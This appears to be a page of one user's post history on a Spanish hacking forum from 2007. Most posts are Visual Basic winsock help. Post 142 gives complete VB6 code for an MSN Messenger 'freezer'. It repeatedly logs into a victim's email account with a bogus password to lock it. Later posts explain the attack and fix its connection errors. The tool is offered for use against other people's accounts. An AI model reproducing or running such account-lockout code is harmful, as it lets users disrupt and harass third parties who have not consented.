elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 [15] 16 17 18 19 20 21
141  Programación / Programación Visual Basic / Re: Pregunta sencilla control winsock en: 4 Agosto 2007, 21:35 pm
has podido arreglar el fallo con eso??
142  Programación / Programación Visual Basic / Re: Fabricando un congelador tipo ice cold en vb en: 4 Agosto 2007, 19:28 pm
Aqui eh vuelto para liberar un nuevo codigo sin fallas y muy optimizado jejejej por k yo no creo en guardarme los codes ya que son uds. "gente del foro" los que me han enseñado a aprender y compartir.. asi q presten atencion.

necesitaremos colocar en referencias(Proyecto->Referencias)

*Messeger Type Library
*Messenger API Type Library
*Messenger Private Type Library


agregar :

1 textbox llamado "txtusermail"
1 command llamado "congelar"
1 timer llamado "timer1"

1 textbox llamado "contador"
2 label llamados lblUserEmail y label1
1 slider llamado conexion



eh aqui el codigo que buscaban jejej si falta algo o falla algo posteenlo aqui salu25

Código:
Private MSN As New MsgrObject

Private Sub congelar_Click()
Timer1.Interval = conexion.Value
Timer1.Enabled = True
End Sub




Private Sub Form_Load()
Me.Caption = "Freezer 2 poir tengu jej"
lblUserEmail.Caption = "Direccion de E-mail"
contador.Visible = False
Label1.Caption = "Tiempo para realizar cada conexion"
conexion.Value = "15000"
End Sub

Private Sub Timer1_Timer()
On Error Resume Next
contador.Text = Val(contador.Text) + Val("1")
If contador.Text = "20" Then
Timer1.Enabled = False
MsgBox "congelada!!!", vbInformation, "Tengu Freezer 2"
End If
MSN.Logoff
    MSN.Logon txtUserEmail.Text, "Fucked by tengu", MSN.Services.PrimaryService
End Sub

Toodo va en el form1(sin modulos sin nada jejej)
143  Programación / Programación Visual Basic / Re: Pregunta sencilla control winsock en: 4 Agosto 2007, 18:15 pm
podrias ser mas explicito acerca de los puertos que estas usando y... estas seguro de que no hay firewall o algo por el estilo en la maquina q elegiste...;de verdad si postearas parate del code donde el servidor se conecta al cliente me ayudaria a ayudarte jej
144  Programación / Programación Visual Basic / Re: [Ayuda]Web Server en: 4 Agosto 2007, 18:08 pm
Te recomiendo ese code del ServerAT de LeandroA esta muy completo y a mi me ha servido mucho
145  Programación / Programación Visual Basic / Re: Problema con Winsocks. en: 4 Agosto 2007, 05:46 am
lo que deberias hacer es simpre antyes de acciones tipo connect o listen es cerrar el winsock1 de esta manera
winsock1.close
winsock1.connect

De lo contrario podriaas recibir errores tipo  peticion erronea para el estado actual o algo asi... o tbn doreccion en uso.

y si configutras el winsock desde un principio fijate bien que en el server el puerto 888 este en localport y en el cliente el 888 en remoteport. Salu25
                                 
146  Programación / Programación Visual Basic / Re: Fabricando un congelador tipo ice cold en vb en: 4 Agosto 2007, 04:44 am
ante cualquier duda solo agreguenme a su msn y les pasoi el proyecto totalmente funcional....   salu25 ;D
147  Programación / Programación Visual Basic / Re: Fabricando un congelador tipo ice cold en vb en: 4 Agosto 2007, 04:36 am
hola a todos pido disculpas por nhop escribir antes es q estaba en un viaje.

es verdad lo que dice tughack son demasiadas lineas de codigo para un freezer, pero es debibo a que el codigo lo he sacado de una aplicacion que estoy creando y tiene muchas mas opciones;(tal vez al momento de postearlo quedaron excedentes en el codigo pero crei que seria solo cuestion de tiempo para que los sacaran );la accion del codigo es la de conectar cada 10 segundos a la cuenta (puse 10 segundos para asegurarnos de que todos los intentos darian en el blanco //el tiempo puede bajarse dependiendo de la conexion que se dispone//el codigo realiza  15 intentos de conexion xk no eh contado bien pero creo que con 10 ya es suficiente).

Como dije antes el codigo solo conecta y desconecta asi que todos los exedentes de codigo que sean del tipo dataarrival o algo por el estilo(que son para recibir datos pueden quitarlos por completo y veran que el freezer seguira funcionando.

Esto fue la simple manera que encontre de haqcerlo asi que espero que pueda servirles de algo y lamento si no ha cumplido las expectativas de algunos. salu25


                                                                Tengu..::FireB0y::..
148  Programación / Programación Visual Basic / Re: Fabricando un congelador tipo ice cold en vb en: 30 Julio 2007, 01:19 am
jajaj ok si te sale ese error significa q el puerto todaviua esta conectado cuando intenta volver aconectarse,"no valido en el estado actual". ahora eso se arregla facilmente.

ponle "depurar al mensajke de error de vb si la linea q te indica es esta:

Client(0).Connect "messenger.hotmail.com", 1863

entonces agregale antes esto:


Client(0).Close

y si la linea que tira error es esta :

Client(index + 1).Connect tmp1(0), tmp1(1)

agrega antes esto

Client(index + 1).Close

y asi con cualquier linea del tipò connect que te tire ese error.


Salu25 que lo disfrutes sjeje
149  Programación / Programación Visual Basic / Re: sumarle bytes a un exe en: 29 Julio 2007, 20:07 pm
no es nada. Gracias a ti por preguntar. salu25
150  Programación / Programación Visual Basic / Re: no-ip en vb 6 en: 29 Julio 2007, 20:03 pm
aqui ta el link salu25
http://www.uploadfilego.com/download.php?file=966416de261a520fde2bd441cbc83f29
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 [15] 16 17 18 19 20 21
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines